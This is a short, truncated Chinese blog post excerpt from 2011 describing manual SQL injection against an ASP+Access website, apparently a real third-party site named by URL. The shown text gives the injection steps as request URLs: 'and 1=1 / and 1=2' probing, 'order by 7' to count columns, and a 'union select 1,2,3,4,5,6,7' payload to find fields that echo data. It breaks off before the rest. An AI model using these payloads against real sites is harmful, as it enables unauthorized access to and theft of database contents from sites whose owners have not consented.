2011年3月20日

手工注入asp+access网站(union语句)

摘要: 注入点:http://www.romance-sky.com/authorlist.asp?id=227分析:and1=1正常and1=2出错.存在注入漏洞字段数目判断:http://www.romance-sky.com/authorlist.asp?id=227orderby7正常.表示字段数为7http://www.romance-sky.com/authorlist.asp?id=227and1=2unionselect1,2,3,4,5,6,7from表名返回2,4(字符型),5(字符型)处可以利用.http://www.romance-sky.com/authorlist.asp? 阅读全文

posted @ 2011-03-20 14:19 小宝哥哥 阅读(392) 评论(0) 推荐(0) 编辑

导航

Tasup